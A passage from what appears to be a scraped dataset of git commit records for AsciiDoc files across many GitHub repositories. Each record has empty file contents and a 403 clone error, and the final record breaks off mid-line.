{"commit":"87984fffe3b047cf786927a5e3fff9e027ec94a5","subject":"job: #11992 Introducing analysis note for import .prj files as Deployments.","message":"job: #11992 Introducing analysis note for import .prj files as Deployments.\n","repos":"lwriemen\/mc,rmulvey\/mc,cortlandstarrett\/mc,xtuml\/mc,lwriemen\/mc,leviathan747\/mc,rmulvey\/mc,cortlandstarrett\/mc,lwriemen\/mc,rmulvey\/mc,cortlandstarrett\/mc,xtuml\/mc,rmulvey\/mc,xtuml\/mc,leviathan747\/mc,leviathan747\/mc,lwriemen\/mc,lwriemen\/mc,leviathan747\/mc,xtuml\/mc,leviathan747\/mc,rmulvey\/mc,lwriemen\/mc,rmulvey\/mc,cortlandstarrett\/mc,leviathan747\/mc,cortlandstarrett\/mc,xtuml\/mc,cortlandstarrett\/mc,xtuml\/mc","old_file":"doc\/notes\/11444_wasl\/11992_import_deployments_ant.adoc","new_file":"doc\/notes\/11444_wasl\/11992_import_deployments_ant.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xtuml\/mc.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9886c8efad6693f742ec225722a1cc1e0154e9f2","subject":"Update 2016-03-30-Full-Path-Disclosure-Veo-donde-estas.adoc","message":"Update 2016-03-30-Full-Path-Disclosure-Veo-donde-estas.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-03-30-Full-Path-Disclosure-Veo-donde-estas.adoc","new_file":"_posts\/2016-03-30-Full-Path-Disclosure-Veo-donde-estas.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a517c501dbba82bccab4983f58278eb52e03d41f","subject":"Update 2017-10-27-Nginxngx-small-lightminio-S3-Docker.adoc","message":"Update 2017-10-27-Nginxngx-small-lightminio-S3-Docker.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-10-27-Nginxngx-small-lightminio-S3-Docker.adoc","new_file":"_posts\/2017-10-27-Nginxngx-small-lightminio-S3-Docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b7d08f37dd1e45dbf4e27cbfc252b68f4e966750","subject":"Update 2016-11-07-Healthcare-has-a-No-Problem-Problem.adoc","message":"Update 2016-11-07-Healthcare-has-a-No-Problem-Problem.adoc","repos":"fqure\/fqure.github.io,fqure\/fqure.github.io,fqure\/fqure.github.io,fqure\/fqure.github.io","old_file":"_posts\/2016-11-07-Healthcare-has-a-No-Problem-Problem.adoc","new_file":"_posts\/2016-11-07-Healthcare-has-a-No-Problem-Problem.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fqure\/fqure.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e874205fd22f78ed85d15d498ee075f0489a6925","subject":"Regenerated without unnecessary empty lines","message":"Regenerated without unnecessary empty lines\n","repos":"opencypher\/openCypher,opencypher\/openCypher,opencypher\/openCypher,opencypher\/openCypher","old_file":"tck\/index.adoc","new_file":"tck\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/opencypher\/openCypher.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"68f6fd9bfd640c3d71d19e01bcf0fe3582ca70bb","subject":"Update 2015-04-02-First-Post.adoc","message":"Update 2015-04-02-First-Post.adoc","repos":"CBSti\/CBSti.github.io,CBSti\/CBSti.github.io,CBSti\/CBSti.github.io","old_file":"_posts\/2015-04-02-First-Post.adoc","new_file":"_posts\/2015-04-02-First-Post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/CBSti\/CBSti.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a8f74af5cf57d9a5246263280feade2117262517","subject":"Update 2015-09-21-SQL-review.adoc","message":"Update 2015-09-21-SQL-review.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-09-21-SQL-review.adoc","new_file":"_posts\/2015-09-21-SQL-review.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c3a54156a6d369db556086995d7371f72ae7ff92","subject":"Update 2017-04-14-Metal-Case.adoc","message":"Update 2017-04-14-Metal-Case.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2017-04-14-Metal-Case.adoc","new_file":"_posts\/2017-04-14-Metal-Case.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4a406c40ff569f4af30ca89a319e116ccc382a44","subject":"Added first revision of week 2 content","message":"Added first revision of week 2 content\n","repos":"cjdb\/cs6771-16s2,cjdb\/cs6771-16s2","old_file":"week02.asciidoc","new_file":"week02.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cjdb\/cs6771-16s2.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c95042dd0acaa45b3db379a2cdd377d607f91385","subject":"mention platform support","message":"mention platform support\n","repos":"autopulated\/ninja,fuchsia-mirror\/third_party-ninja,mdempsky\/ninja,colincross\/ninja,ThiagoGarciaAlves\/ninja,maximuska\/ninja,mydongistiny\/ninja,glensc\/ninja,yannicklm\/ninja,nocnokneo\/ninja,vvvrrooomm\/ninja,pck\/ninja,moroten\/ninja,ThiagoGarciaAlves\/ninja,jhanssen\/ninja,bmeurer\/ninja,nickhutchinson\/ninja,fifoforlifo\/ninja,drbo\/ninja,Ju2ender\/ninja,nicolasdespres\/ninja,ninja-build\/ninja,ikarienator\/ninja,iwadon\/ninja,vvvrrooomm\/ninja,ThiagoGarciaAlves\/ninja,nafest\/ninja,ehird\/ninja,ndsol\/subninja,AoD314\/ninja,tfarina\/ninja,iwadon\/ninja,lizh06\/ninja,automeka\/ninja,ikarienator\/ninja,sorbits\/ninja,iwadon\/ninja,ehird\/ninja,jimon\/ninja,synaptek\/ninja,lizh06\/ninja,hnney\/ninja,liukd\/ninja,dpwright\/ninja,tfarina\/ninja,Maratyszcza\/ninja-pypi,sxlin\/dist_ninja,pck\/ninja,LuaDist\/ninja,nafest\/ninja,nafest\/ninja,Ju2ender\/ninja,lizh06\/ninja,martine\/ninja,iwadon\/ninja,kimgr\/ninja,mydongistiny\/ninja,maximuska\/ninja,pathscale\/ninja,jimon\/ninja,barak\/ninja,mohamed\/ninja,chenyukang\/ninja,kissthink\/ninja,ndsol\/subninja,autopulated\/ninja,syntheticpp\/ninja,nico\/ninja,moroten\/ninja,bradking\/ninja,PetrWolf\/ninja-main,nocnokneo\/ninja,nafest\/ninja,dendy\/ninja,glensc\/ninja,sorbits\/ninja,automeka\/ninja,Qix-\/ninja,ctiller\/ninja,hnney\/ninja,nicolasdespres\/ninja,metti\/ninja,curinir\/ninja,martine\/ninja,kimgr\/ninja,jsternberg\/ninja,ctiller\/ninja,jimon\/ninja,nocnokneo\/ninja,mohamed\/ninja,dorgonman\/ninja,sxlin\/dist_ninja,TheOneRing\/ninja,dpwright\/ninja,ikarienator\/ninja,nicolasdespres\/ninja,ninja-build\/ninja,Maratyszcza\/ninja-pypi,chenyukang\/ninja,ndsol\/subninja,dabrahams\/ninja,pck\/ninja,mutac\/ninja,moroten\/ninja,glensc\/ninja,jendrikillner\/ninja,LuaDist\/ninja,glensc\/ninja,liukd\/ninja,rnk\/ninja,sxlin\/dist_ninja,Qix-\/ninja,syntheticpp\/ninja,sorbits\/ninja,LuaDist\/ninja,pathscale\/ninja,TheOneRing\/ninja,jendrikillner\/ninja,nickhutchinson\/ninja,colincross\/ninja,nico\/ninja,curinir\/ninja,guiquanz\/ninja,jhanssen\/ninja,jsternberg\/ninja,jendrikillner\/ninja,dabrahams\/ninja,kissthink\/ninja,nicolasdespres\/ninja,liukd\/ninja,moroten\/ninja,nickhutchinson\/ninja,sxlin\/dist_ninja,curinir\/ninja,TheOneRing\/ninja,ukai\/ninja,tfarina\/ninja,sgraham\/ninja,ignatenkobrain\/ninja,sgraham\/ninja,dorgonman\/ninja,jhanssen\/ninja,dorgonman\/ninja,PetrWolf\/ninja-main,ikarienator\/ninja,rjogrady\/ninja,ignatenkobrain\/ninja,Qix-\/ninja,mohamed\/ninja,ukai\/ninja,ehird\/ninja,mdempsky\/ninja,hnney\/ninja,dorgonman\/ninja,curinir\/ninja,sxlin\/dist_ninja,liukd\/ninja,jimon\/ninja,ctiller\/ninja,fifoforlifo\/ninja,TheOneRing\/ninja,hnney\/ninja,kimgr\/ninja,juntalis\/ninja,AoD314\/ninja,synaptek\/ninja,pck\/ninja,maruel\/ninja,ukai\/ninja,guiquanz\/ninja,bradking\/ninja,sxlin\/dist_ninja,nico\/ninja,atetubou\/ninja,nickhutchinson\/ninja,vvvrrooomm\/ninja,ctiller\/ninja,atetubou\/ninja,ninja-build\/ninja,metti\/ninja,Ju2ender\/ninja,purcell\/ninja,ehird\/ninja,okuoku\/ninja,ilor\/ninja,mohamed\/ninja,juntalis\/ninja,ukai\/ninja,autopulated\/ninja,synaptek\/ninja,drbo\/ninja,sgraham\/ninja,bradking\/ninja,metti\/ninja,dendy\/ninja,ThiagoGarciaAlves\/ninja,rnk\/ninja,purcell\/ninja,okuoku\/ninja,dabrahams\/ninja,purcell\/ninja,martine\/ninja,metti\/ninja,bradking\/ninja,lizh06\/ninja,Maratyszcza\/ninja-pypi,colincross\/ninja,maruel\/ninja,dpwright\/ninja,barak\/ninja,okuoku\/ninja,dendy\/ninja,jsternberg\/ninja,chenyukang\/ninja,syntheticpp\/ninja,maximuska\/ninja,yannicklm\/ninja,atetubou\/ninja,colincross\/ninja,kimgr\/ninja,ignatenkobrain\/ninja,vvvrrooomm\/ninja,sgraham\/ninja,rnk\/ninja,bmeurer\/ninja,okuoku\/ninja,jendrikillner\/ninja,PetrWolf\/ninja-main,sorbits\/ninja,pathscale\/ninja,AoD314\/ninja,juntalis\/ninja,mdempsky\/ninja,mgaunard\/ninja,Ju2ender\/ninja,yannicklm\/ninja,purcell\/ninja,fifoforlifo\/ninja,bmeurer\/ninja,yannicklm\/ninja,dabrahams\/ninja,barak\/ninja,pathscale\/ninja,nocnokneo\/ninja,syntheticpp\/ninja,LuaDist\/ninja,dpwright\/ninja,PetrWolf\/ninja-main,tfarina\/ninja,mydongistiny\/ninja,mutac\/ninja,fuchsia-mirror\/third_party-ninja,automeka\/ninja,drbo\/ninja,jsternberg\/ninja,mutac\/ninja,rnk\/ninja,fuchsia-mirror\/third_party-ninja,synaptek\/ninja,jhanssen\/ninja,guiquanz\/ninja,fuchsia-mirror\/third_party-ninja,juntalis\/ninja,atetubou\/ninja,ignatenkobrain\/ninja,maruel\/ninja,mgaunard\/ninja,bmeurer\/ninja,maximuska\/ninja,martine\/ninja,barak\/ninja,chenyukang\/ninja,Qix-\/ninja,rjogrady\/ninja,Maratyszcza\/ninja-pypi,fifoforlifo\/ninja,nico\/ninja,automeka\/ninja,ilor\/ninja,AoD314\/ninja,kissthink\/ninja,mydongistiny\/ninja,ilor\/ninja,mgaunard\/ninja,rjogrady\/ninja,dendy\/ninja,mutac\/ninja,maruel\/ninja,ilor\/ninja,kissthink\/ninja,autopulated\/ninja,guiquanz\/ninja,rjogrady\/ninja,ninja-build\/ninja,ndsol\/subninja,mdempsky\/ninja,mgaunard\/ninja,drbo\/ninja,sxlin\/dist_ninja","old_file":"doc\/manual.asciidoc","new_file":"doc\/manual.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nafest\/ninja.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"eaa4d6c22c5aeae1ef42a85a62dbedf86d546b07","subject":"update some windows references in the docs","message":"update some windows references in the docs\n\nDrop the timing info, it's too variable to commit to a manual.\n","repos":"iwadon\/ninja,jendrikillner\/ninja,maruel\/ninja,juntalis\/ninja,jimon\/ninja,hnney\/ninja,TheOneRing\/ninja,guiquanz\/ninja,rnk\/ninja,atetubou\/ninja,Qix-\/ninja,sgraham\/ninja,mydongistiny\/ninja,juntalis\/ninja,mdempsky\/ninja,synaptek\/ninja,autopulated\/ninja,dorgonman\/ninja,mohamed\/ninja,kissthink\/ninja,ilor\/ninja,rjogrady\/ninja,syntheticpp\/ninja,iwadon\/ninja,ThiagoGarciaAlves\/ninja,sxlin\/dist_ninja,jendrikillner\/ninja,yannicklm\/ninja,sxlin\/dist_ninja,pathscale\/ninja,pathscale\/ninja,drbo\/ninja,rnk\/ninja,purcell\/ninja,purcell\/ninja,ninja-build\/ninja,AoD314\/ninja,jimon\/ninja,mydongistiny\/ninja,jhanssen\/ninja,nicolasdespres\/ninja,pathscale\/ninja,automeka\/ninja,lizh06\/ninja,tfarina\/ninja,rjogrady\/ninja,kissthink\/ninja,mohamed\/ninja,nico\/ninja,kimgr\/ninja,glensc\/ninja,fifoforlifo\/ninja,nocnokneo\/ninja,tfarina\/ninja,sorbits\/ninja,vvvrrooomm\/ninja,synaptek\/ninja,mgaunard\/ninja,guiquanz\/ninja,synaptek\/ninja,ctiller\/ninja,fuchsia-mirror\/third_party-ninja,vvvrrooomm\/ninja,liukd\/ninja,syntheticpp\/ninja,iwadon\/ninja,martine\/ninja,martine\/ninja,liukd\/ninja,mydongistiny\/ninja,jimon\/ninja,syntheticpp\/ninja,jendrikillner\/ninja,ignatenkobrain\/ninja,dorgonman\/ninja,nico\/ninja,fifoforlifo\/ninja,ctiller\/ninja,dorgonman\/ninja,ilor\/ninja,kimgr\/ninja,martine\/ninja,iwadon\/ninja,metti\/ninja,ndsol\/subninja,dorgonman\/ninja,nafest\/ninja,hnney\/ninja,ilor\/ninja,Ju2ender\/ninja,mydongistiny\/ninja,rjogrady\/ninja,dendy\/ninja,mgaunard\/ninja,nico\/ninja,yannicklm\/ninja,metti\/ninja,sgraham\/ninja,nafest\/ninja,fifoforlifo\/ninja,sxlin\/dist_ninja,dpwright\/ninja,mohamed\/ninja,tfarina\/ninja,moroten\/ninja,lizh06\/ninja,fuchsia-mirror\/third_party-ninja,lizh06\/ninja,fuchsia-mirror\/third_party-ninja,mdempsky\/ninja,bradking\/ninja,nickhutchinson\/ninja,ignatenkobrain\/ninja,autopulated\/ninja,nicolasdespres\/ninja,Maratyszcza\/ninja-pypi,Ju2ender\/ninja,jhanssen\/ninja,metti\/ninja,metti\/ninja,ThiagoGarciaAlves\/ninja,Maratyszcza\/ninja-pypi,automeka\/ninja,TheOneRing\/ninja,ndsol\/subninja,sorbits\/ninja,jhanssen\/ninja,juntalis\/ninja,ignatenkobrain\/ninja,rjogrady\/ninja,Maratyszcza\/ninja-pypi,glensc\/ninja,nickhutchinson\/ninja,ThiagoGarciaAlves\/ninja,nocnokneo\/ninja,liukd\/ninja,jimon\/ninja,autopulated\/ninja,nocnokneo\/ninja,moroten\/ninja,maruel\/ninja,yannicklm\/ninja,syntheticpp\/ninja,lizh06\/ninja,ndsol\/subninja,mgaunard\/ninja,nafest\/ninja,kimgr\/ninja,tfarina\/ninja,dpwright\/ninja,TheOneRing\/ninja,ctiller\/ninja,fifoforlifo\/ninja,purcell\/ninja,AoD314\/ninja,autopulated\/ninja,glensc\/ninja,bradking\/ninja,drbo\/ninja,martine\/ninja,juntalis\/ninja,maruel\/ninja,nafest\/ninja,synaptek\/ninja,bmeurer\/ninja,pathscale\/ninja,automeka\/ninja,kissthink\/ninja,Qix-\/ninja,ilor\/ninja,jendrikillner\/ninja,sorbits\/ninja,sorbits\/ninja,nico\/ninja,nicolasdespres\/ninja,atetubou\/ninja,dendy\/ninja,nocnokneo\/ninja,colincross\/ninja,dendy\/ninja,bmeurer\/ninja,bradking\/ninja,ctiller\/ninja,colincross\/ninja,drbo\/ninja,purcell\/ninja,liukd\/ninja,TheOneRing\/ninja,atetubou\/ninja,ndsol\/subninja,yannicklm\/ninja,sxlin\/dist_ninja,sxlin\/dist_ninja,rnk\/ninja,vvvrrooomm\/ninja,jhanssen\/ninja,bmeurer\/ninja,bradking\/ninja,moroten\/ninja,colincross\/ninja,ThiagoGarciaAlves\/ninja,Qix-\/ninja,hnney\/ninja,Qix-\/ninja,colincross\/ninja,rnk\/ninja,ninja-build\/ninja,sgraham\/ninja,nicolasdespres\/ninja,nickhutchinson\/ninja,dpwright\/ninja,ignatenkobrain\/ninja,dpwright\/ninja,Ju2ender\/ninja,mdempsky\/ninja,Ju2ender\/ninja,Maratyszcza\/ninja-pypi,sxlin\/dist_ninja,mgaunard\/ninja,kimgr\/ninja,dendy\/ninja,automeka\/ninja,nickhutchinson\/ninja,AoD314\/ninja,drbo\/ninja,sxlin\/dist_ninja,guiquanz\/ninja,bmeurer\/ninja,mohamed\/ninja,moroten\/ninja,mdempsky\/ninja,hnney\/ninja,maruel\/ninja,glensc\/ninja,atetubou\/ninja,AoD314\/ninja,sgraham\/ninja,ninja-build\/ninja,kissthink\/ninja,guiquanz\/ninja,fuchsia-mirror\/third_party-ninja,ninja-build\/ninja,vvvrrooomm\/ninja","old_file":"doc\/manual.asciidoc","new_file":"doc\/manual.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lizh06\/ninja.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6dd466fa02358ea02c0d8173226d8490ce01998e","subject":"Update 2016-05-06-Welcome-Pepper.adoc","message":"Update 2016-05-06-Welcome-Pepper.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-05-06-Welcome-Pepper.adoc","new_file":"_posts\/2016-05-06-Welcome-Pepper.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"301c326a9827a57f142875446a4ec7b1e75df99d","subject":"Update 2017-01-19-Swift-Web-View.adoc","message":"Update 2017-01-19-Swift-Web-View.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-01-19-Swift-Web-View.adoc","new_file":"_posts\/2017-01-19-Swift-Web-View.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ad2838cb3492b4141aaae75556b7be4c735b5ea9","subject":"Update 2017-01-01-Streaming-Video-di-OSMC.adoc","message":"Update 2017-01-01-Streaming-Video-di-OSMC.adoc","repos":"lovian\/lovian.github.io,lovian\/lovian.github.io,lovian\/lovian.github.io,lovian\/lovian.github.io","old_file":"_posts\/2017-01-01-Streaming-Video-di-OSMC.adoc","new_file":"_posts\/2017-01-01-Streaming-Video-di-OSMC.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lovian\/lovian.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3f2e7a908a0de73d7a9a2609f7af88f790084d1d","subject":"Updated documentation","message":"Updated documentation\n","repos":"RobWin\/javaslang-circuitbreaker,storozhukBM\/javaslang-circuitbreaker,goldobin\/resilience4j,javaslang\/javaslang-circuitbreaker,resilience4j\/resilience4j,mehtabsinghmann\/resilience4j,drmaas\/resilience4j,drmaas\/resilience4j,RobWin\/circuitbreaker-java8,resilience4j\/resilience4j","old_file":"src\/docs\/asciidoc\/usage_guide.adoc","new_file":"src\/docs\/asciidoc\/usage_guide.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/resilience4j\/resilience4j.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"75a9a7bca0abb697594d015e7c1ec32fcaf45e28","subject":"Add missing file","message":"Add missing file\n","repos":"stuartwdouglas\/wildfly.org,rhusar\/wildfly.org,stuartwdouglas\/wildfly.org,adrianoschmidt\/wildfly.org,luck3y\/wildfly.org,luck3y\/wildfly.org,luck3y\/wildfly.org,adrianoschmidt\/wildfly.org,stuartwdouglas\/wildfly.org,adrianoschmidt\/wildfly.org,ctomc\/wildfly.org,stuartwdouglas\/wildfly.org,rhusar\/wildfly.org,ctomc\/wildfly.org,ctomc\/wildfly.org,ctomc\/wildfly.org,rhusar\/wildfly.org,adrianoschmidt\/wildfly.org,luck3y\/wildfly.org,rhusar\/wildfly.org","old_file":"news\/2015-06-10-WildFly9-CR2-Released.adoc","new_file":"news\/2015-06-10-WildFly9-CR2-Released.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rhusar\/wildfly.org.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"fbde886e689502be522df90134f950ecfa450477","subject":"--wip-- [skip ci]","message":"--wip-- [skip ci]\n","repos":"moccalotto\/kaos,moccalotto\/kaos","old_file":"_brainstorms\/showdown.asciidoc","new_file":"_brainstorms\/showdown.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/moccalotto\/kaos.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c9943cdd3bb5f9087986ae0f00d516781d0bc403","subject":"Update 2017-04-14-Azure-3.adoc","message":"Update 2017-04-14-Azure-3.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-04-14-Azure-3.adoc","new_file":"_posts\/2017-04-14-Azure-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"527ae7ecf8bedfb63ed0f5be870a4bd91f007885","subject":"Update 2018-01-20-Bitrise.adoc","message":"Update 2018-01-20-Bitrise.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-01-20-Bitrise.adoc","new_file":"_posts\/2018-01-20-Bitrise.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"871c13293baf4fbaee63447611e32c33499056ad","subject":"Update 2018-09-25-Scratch.adoc","message":"Update 2018-09-25-Scratch.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-09-25-Scratch.adoc","new_file":"_posts\/2018-09-25-Scratch.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"43e81b6804b7398ad8c0f3d376091f3fe784c0fd","subject":"Update 2017-10-13-Nihayet.adoc","message":"Update 2017-10-13-Nihayet.adoc","repos":"Aferide\/Aferide.github.io,Aferide\/Aferide.github.io,Aferide\/Aferide.github.io,Aferide\/Aferide.github.io","old_file":"_posts\/2017-10-13-Nihayet.adoc","new_file":"_posts\/2017-10-13-Nihayet.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Aferide\/Aferide.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"178ee50a970c49c578b6f82fa0470abc742f142a","subject":"Add ClojuTRE 2017","message":"Add ClojuTRE 2017\n","repos":"clojure\/clojure-site","old_file":"content\/events\/2017\/clojutre.adoc","new_file":"content\/events\/2017\/clojutre.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"f191a0acf8cb50d4c0793d36e7ae426a448dc11b","subject":"Getting current ASDF version","message":"Getting current ASDF version\n","repos":"cmpitg\/programming-language-notes","old_file":"Common-Lisp.adoc","new_file":"Common-Lisp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"8e5c33a7b604e7c2336c8a7da96ff8018ddddf8b","subject":"Update 2015-10-11-Configure-Hadoop-261-on-Ubuntu-Server.adoc","message":"Update 2015-10-11-Configure-Hadoop-261-on-Ubuntu-Server.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-10-11-Configure-Hadoop-261-on-Ubuntu-Server.adoc","new_file":"_posts\/2015-10-11-Configure-Hadoop-261-on-Ubuntu-Server.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cd011cb0b37c3e2494586988bee1d84cb504f2cd","subject":"Update 2015-11-04-Effective-Java-Principles-and-Objects.adoc","message":"Update 2015-11-04-Effective-Java-Principles-and-Objects.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-11-04-Effective-Java-Principles-and-Objects.adoc","new_file":"_posts\/2015-11-04-Effective-Java-Principles-and-Objects.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"28a799969bdce88d0de7faf38077e36ba2807e2d","subject":"Update 2017-09-24-Backdoor-CTF-2017.adoc","message":"Update 2017-09-24-Backdoor-CTF-2017.adoc","repos":"hva314\/blog,hva314\/blog,hva314\/blog,hva314\/blog","old_file":"_posts\/2017-09-24-Backdoor-CTF-2017.adoc","new_file":"_posts\/2017-09-24-Backdoor-CTF-2017.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hva314\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1170949f208e29b4b6c1f8208840e12524a385c5","subject":"rust: add python porting notes","message":"rust: add python porting notes\n","repos":"vmiklos\/vmexam,vmiklos\/vmexam,vmiklos\/vmexam,vmiklos\/vmexam,vmiklos\/vmexam,vmiklos\/vmexam,vmiklos\/vmexam,vmiklos\/vmexam,vmiklos\/vmexam,vmiklos\/vmexam,vmiklos\/vmexam,vmiklos\/vmexam,vmiklos\/vmexam,vmiklos\/vmexam","old_file":"rust\/python-prorting.adoc","new_file":"rust\/python-prorting.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/vmiklos\/vmexam.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8cc846709549c73ba5d03c8b0dc41d18e4ccabc0","subject":"Add FAQs - add truename","message":"Add FAQs - add truename\n","repos":"cmpitg\/programming-language-notes","old_file":"Common-Lisp.adoc","new_file":"Common-Lisp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"2c121a034e33a5aee480e3332c2b28f38bcd35d7","subject":"Added Act-As-User docs","message":"Added Act-As-User docs\n","repos":"smoope\/java-sdk","old_file":"src\/main\/resources\/docs\/sdk-reference.adoc","new_file":"src\/main\/resources\/docs\/sdk-reference.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/smoope\/java-sdk.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"078a6827e8e701b5cef3a328b460384ca26b082d","subject":"Draft for CNV1598. assembly to cover prereq for cnv install","message":"Draft for CNV1598. assembly to cover prereq for cnv 